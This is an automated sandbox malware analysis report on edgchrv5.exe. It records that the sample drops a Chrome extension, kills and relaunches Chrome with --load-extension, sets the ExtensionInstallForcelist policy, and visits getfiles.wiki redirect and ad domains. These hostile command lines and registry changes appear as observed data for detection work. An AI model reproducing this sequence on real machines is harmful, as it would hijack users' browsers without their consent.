Edit tour

Windows Analysis Report
edgchrv5.exe

Overview

General Information

Sample Name:	edgchrv5.exe
Analysis ID:	886159
MD5:	0c0a3d01c45f66056d607bbad486b39b
SHA1:	d96aa9b9fe3a0515d70f3e909f00c865dfc5821c
SHA256:	d158f3cfb47665928c5d304495fa99050a9e4c5b8d54332d400eec78bd7f98b6
Tags:	exe
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Machine Learning detection for sample

Modifies Chrome's extension installation force list

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

PE file contains an invalid checksum

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Uses taskkill to terminate processes

Contains functionality to dynamically determine API calls

Installs a Chrome extension

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Enables debug privileges

Classification

Process Tree

System is w10x64

edgchrv5.exe (PID: 5884 cmdline: C:\Users\user\Desktop\edgchrv5.exe MD5: 0C0A3D01C45F66056D607BBAD486B39B)

chrome.exe (PID: 1264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 5244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1612,i,1794324843492306011,10960809386793775335,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

taskkill.exe (PID: 7044 cmdline: /IM chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chrome.exe (PID: 7216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1728,i,13370300744351051505,8597988726894195581,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

taskkill.exe (PID: 7800 cmdline: /F /IM chrome.exe /T MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg

Source: unknown

DNS traffic detected: queries for: getfiles.wiki

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /welcome.php HTTP/1.1Host: getfiles.wikiConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /webstore/inlineinstall/detail/ecffbknobglofafinobbcmaionnihcma HTTP/1.1Host: chrome.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r.php?key=pvwarw3 HTTP/1.1Host: exturl.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /redirect.php HTTP/1.1Host: getfiles.wikiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=jsonp&callback=getIP HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc= HTTP/1.1Host: getfiles.wikiConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://getfiles.wiki/redirect.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: campaignkeepy.buzzConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: campaignkejfcv.buzzConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1686622029954&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:199562055&@b3:1686622030&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&@w HTTP/1.1Host: s4.histats.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1Host: e.dtscout.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pv/?_a=v&_h=getfiles.wiki&_ss=ng6jfd0g1c&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=15t7&_cb=_dtspv.c HTTP/1.1Host: t.dtscout.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; oa=1; df=1686589631
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: getfiles.wikiConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HstCfa4708787=1686622029954; HstCla4708787=1686622029954; HstCmu4708787=1686622029954; HstPn4708787=1; HstPt4708787=1; HstCnv4708787=1; HstCns4708787=1

Source: edgchrv5.exe, 00000000.00000002.397704318.000000000144A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: edgchrv5.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\edgchrv5.exe

Code function: 0_2_010071BD

0_2_010071BD

Source: C:\Users\user\Desktop\edgchrv5.exe

Code function: String function: 01002B10 appears 31 times

Source: edgchrv5.exe	ReversingLabs: Detection: 29%
Source: edgchrv5.exe	Virustotal: Detection: 35%

Source: edgchrv5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\edgchrv5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\edgchrv5.exe C:\Users\user\Desktop\edgchrv5.exe
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1612,i,1794324843492306011,10960809386793775335,131072 /prefetch:8
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1728,i,13370300744351051505,8597988726894195581,131072 /prefetch:8
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php	Jump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exe	Jump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble	Jump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /T	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1612,i,1794324843492306011,10960809386793775335,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1728,i,13370300744351051505,8597988726894195581,131072 /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\edgchrv5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_01

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\edgchrv5.exe

File created: C:\Users\user\AppData\Local\ServiceApp

Jump to behavior

Source: edgchrv5.exe	String found in binary or memory: %s\ServiceApp\apps-helper\web.js
Source: edgchrv5.exe	String found in binary or memory: %s\ServiceApp\apps-helper
Source: edgchrv5.exe	String found in binary or memory: %s\ServiceApp\apps-helper\edge.crx
Source: edgchrv5.exe	String found in binary or memory: %s\ServiceApp\apps-helper\manifest.json
Source: edgchrv5.exe	String found in binary or memory: --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble
Source: edgchrv5.exe	String found in binary or memory: %s\ServiceApp\apps-helper\service.js

Source: classification engine

Classification label: mal48.phis.winEXE@37/11@14/12

Source: C:\Users\user\Desktop\edgchrv5.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: edgchrv5.exe

Static PE information: certificate valid

Source: edgchrv5.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: edgchrv5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: edgchrv5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: edgchrv5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: edgchrv5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: edgchrv5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: edgchrv5.exe

Static PE information: real checksum: 0x39bd8 should be: 0x3d11c

Source: C:\Users\user\Desktop\edgchrv5.exe

Code function: 0_2_01003EDD push ecx; ret

0_2_01003EF0

Source: C:\Users\user\Desktop\edgchrv5.exe

Code function: 0_2_01008CE5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_01008CE5

Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble			Jump to behavior

Source: C:\Users\user\Desktop\edgchrv5.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\edgchrv5.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-9971

Source: C:\Users\user\Desktop\edgchrv5.exe	Code function: 0_2_01001740 SHGetSpecialFolderPathW,GetFileAttributesW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,FindNextFileW,Sleep,GetFileAttributesW,Sleep,Sleep,Sleep,FindNextFileW,FindClose,_memset,GetFileAttributesW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,FindNextFileW,Sleep,Sleep,Sleep,	0_2_01001740
Source: C:\Users\user\Desktop\edgchrv5.exe	Code function: 0_2_01001F50 SHGetSpecialFolderPathW,_memset,FindFirstFileW,_memset,GetFileAttributesW,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegDeleteKeyW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegCloseKey,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,GetFileAttributesW,FindNextFileW,	0_2_01001F50
Source: C:\Users\user\Desktop\edgchrv5.exe	Code function: 0_2_0100180C RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegDeleteKeyW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegCloseKey,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,GetFileAttributesW,FindNextFileW,	0_2_0100180C

Source: C:\Users\user\Desktop\edgchrv5.exe

Code function: 0_2_01002B7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_01002B7C

Source: C:\Users\user\Desktop\edgchrv5.exe

0_2_01008CE5

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\edgchrv5.exe	Code function: 0_2_01002B7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_01002B7C
Source: C:\Users\user\Desktop\edgchrv5.exe	Code function: 0_2_01009DF6 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_01009DF6
Source: C:\Users\user\Desktop\edgchrv5.exe	Code function: 0_2_01005256 SetUnhandledExceptionFilter,	0_2_01005256
Source: C:\Users\user\Desktop\edgchrv5.exe	Code function: 0_2_01004293 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_01004293

Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exe			Jump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /T			Jump to behavior

Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php			Jump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble			Jump to behavior

Source: C:\Users\user\Desktop\edgchrv5.exe

Code function: GetLocaleInfoA,

0_2_0100B152

Source: C:\Users\user\Desktop\edgchrv5.exe

Code function: 0_2_01001410 cpuid

0_2_01001410

Source: C:\Users\user\Desktop\edgchrv5.exe

Code function: 0_2_01005A98 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_01005A98

Lowering of HIPS / PFW / Operating System Security Settings

Modifies Chrome's extension installation force list

Source: C:\Users\user\Desktop\edgchrv5.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\google\chrome\ExtensionInstallForcelist

Jump to behavior

Mitre Att&ck Matrix

